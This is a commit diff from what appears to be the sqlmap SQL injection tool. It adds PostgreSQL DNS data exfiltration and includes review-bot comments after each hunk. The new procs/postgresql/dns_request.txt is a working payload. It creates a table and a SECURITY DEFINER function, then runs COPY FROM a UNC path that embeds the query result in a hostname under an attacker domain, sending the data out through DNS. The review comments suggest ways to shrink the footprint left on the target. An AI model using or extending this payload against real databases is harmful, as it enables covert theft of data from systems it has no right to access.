

Commit 8c6eb4f

committed
adding support for PgSQL DNS data exfiltration
1 parent b2afa87 commit 8c6eb4f

5 files changed

Lines changed: 27 additions & 7 deletions


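--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -805,7 +805,7 @@ def extractPayload(self, inpStr):
 retVal = None
 
 if inpStr:
-match = re.search("%s(?P<result>.*?)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), inpStr)
+match = re.search("%s(?P<result>.*?)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), inpStr, re.S)
 
 if match:
 retVal = match.group("result")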
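Review bot: The delimiter is interpolated into the regex unescaped on the changed line, so extraction would silently break should PAYLOAD_DELIMITER ever contain a regex metacharacter; wrapping both ends in `re.escape(PAYLOAD_DELIMITER)` costs nothing and removes that hidden dependency. Since `re.S` is the actual purpose of this change, a why-comment above the call would save the next reader a trip through git blame: `# re.S: payloads built from multi-line SQL snippets (e.g. dns_request) contain newlines`. extractPayload's return statement lies outside the hunk.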

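--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1609,11 +1609,17 @@ def getSPQLSnippet(dbms, name, **variables):
 retVal = readCachedFileContent(filename)
 
 retVal = re.sub(r"#.+", "", retVal)
-retVal = re.sub(r"(?s);\W+", "; ", retVal).strip()
+retVal = re.sub(r"(?s);\s+", "; ", retVal).strip()
 
 for _ in variables.keys():
 retVal = re.sub(r"%%%s%%" % _, variables[_], retVal)
 
+for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I):
+retVal = retVal.replace(_, randomStr())
+
+for _ in re.findall(r"%RANDINT\d+%", retVal, re.I):
+retVal = retVal.replace(_, randomInt())
+
 _ = re.search(r"%(\w+)%", retVal, re.I)
 if _:
 errMsg = "unresolved variable '%s' in SPL snippet '%s'" % (_.group(1), name)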
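Review bot: The new RANDINT loop hands the result of `randomInt()` straight to `str.replace`; if that helper returns an int rather than a string (its name suggests so, but its definition is not in this hunk), the first snippet that uses a `%RANDINTn%` placeholder will raise TypeError, so the safe form is `retVal = retVal.replace(_, str(randomInt()))`. The RANDSTR loop also relies on a subtlety worth stating: `findall` yields one hit per occurrence, but `replace` rewrites every occurrence on the first hit, which is precisely what keeps a placeholder reused within a snippet (the table name in the new PostgreSQL dns_request, for instance) resolving to one generated name; a comment such as `# replace() hits every occurrence, so a repeated placeholder maps to a single random name` would make that intent explicit. getSPQLSnippet starts before the hunk.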

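--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -15,6 +15,7 @@
 import urlparse
 import traceback
 
+from extra.safe2bin.safe2bin import safecharencode
 from extra.socks.socks import ProxyError
 from extra.multipart import multipartpost
 
@@ -549,7 +550,7 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent
 
 value = agent.replacePayload(value, payload)
 
-logger.log(CUSTOM_LOGGING.PAYLOAD, payload)
+logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload))
 
 if place == PLACE.COOKIE and conf.cookieUrlencode:
 value = agent.removePayloadDelimiters(value)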
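Review bot: The PAYLOAD log line now records an encoded rendering of the payload rather than the exact bytes that `agent.replacePayload` placed into `value` one line above, and nothing at the call site says so; anyone later copying a payload out of the log to replay it will get the escaped form. A one-line comment above the call would prevent that confusion: `# log an escaped rendering so non-printable bytes don't corrupt the console/log; the request itself uses the raw payload`. queryPage continues on both sides of this hunk.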

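--- a/lib/techniques/dns/use.py
+++ b/lib/techniques/dns/use.py
@@ -48,7 +48,7 @@ def dnsUse(payload, expression):
 count = 0
 offset = 1
 
-if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL):
+if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):
 output = hashDBRetrieve(expression, checkConf=True)
 
 if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None:
@@ -60,7 +60,7 @@ def dnsUse(payload, expression):
 while True:
 count += 1
 prefix, suffix = ("%s" % randomStr(3) for _ in xrange(2))
-chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL) else MAX_DNS_LABEL / 4 - 2
+chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2
 _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
 nulledCastedField = agent.nullAndCastField(fieldToCastStr)
 nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
@@ -70,14 +70,14 @@ def dnsUse(payload, expression):
 expressionRequest = getSPQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain)
 expressionUnescaped = unescaper.unescape(expressionRequest)
 
-if Backend.isDbms(DBMS.MSSQL):
+if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
 comment = queries[Backend.getIdentifiedDbms()].comment.query
 query = agent.prefixQuery("; %s" % expressionUnescaped)
 query = agent.suffixQuery("%s;%s" % (query, comment))
 forgedPayload = agent.payload(newValue=query)
 else:
 forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))
-
+
 Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)
 
 _ = conf.dnsServer.pop(prefix, suffix)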
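Review bot: The PostgreSQL path added in the last hunk can only work as stacked statements (the `"; %s"` prefix and `"%s;%s"` suffix built right after the branch), yet the entry guard in the first hunk tests only conf.dnsDomain and the DBMS, so unless stacked-query support is established before dnsUse is entered, the technique will be attempted and fail silently wherever the injection point cannot stack; the guard, or at least the MSSQL/PGSQL branch, should require it. Grouping PGSQL with ORACLE/MYSQL at `MAX_DNS_LABEL / 2` also assumes the extracted chunk grows by at most a factor of two before it becomes a DNS label; whatever encoding does that happens between the second and third hunks, so the chunk_length line deserves `# assumes the Oracle/MySQL/PgSQL chunk at most doubles when encoded for the label — TODO confirm`. Finally, `getSPQLSnippet` is re-evaluated every iteration, so for PostgreSQL each chunk generates a freshly named table and function on the target (see the new procs/postgresql/dns_request.txt); a comment on that call noting the per-chunk footprint would help an operator judge the noise. dnsUse continues beyond the last hunk.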

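--- /dev/null
+++ b/procs/postgresql/dns_request.txt
@@ -0,0 +1,13 @@
+DROP TABLE IF EXISTS %RANDSTR1%;
+CREATE TABLE %RANDSTR1%(%RANDSTR2% text);
+CREATE OR REPLACE FUNCTION %RANDSTR3%()
+RETURNS VOID AS $$
+DECLARE %RANDSTR4% TEXT;
+DECLARE %RANDSTR5% TEXT;
+BEGIN
+SELECT INTO %RANDSTR5% (%QUERY%);
+%RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\'';
+EXECUTE %RANDSTR4%;
+END;
+$$ LANGUAGE plpgsql SECURITY DEFINER;
+SELECT %RANDSTR3%();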
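Review bot: The snippet creates a table (lines 1–2) and a SECURITY DEFINER function (lines 3–12) on the target and never removes them, so every invocation leaves two randomly named objects behind unless the COPY error aborts the batch and the implicit transaction rolls them back, which depends on how the application's driver submits the stacked statements; appending `DROP FUNCTION %RANDSTR3%();` and `DROP TABLE %RANDSTR1%;` after the final SELECT bounds the footprint whenever execution does continue. `COPY … FROM` a server-side path is a privileged operation (superuser, or on newer releases a dedicated file-read role), and nothing in the snippet or its caller records that prerequisite; a leading `# requires superuser / server-side file read privilege; emits one DNS lookup per call via the UNC path` line would carry it, since the loader in common.py strips `#…` comments before use. `SECURITY DEFINER` appears to add nothing here because the function is created and immediately invoked by the same session, so either drop it or comment why it is wanted.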
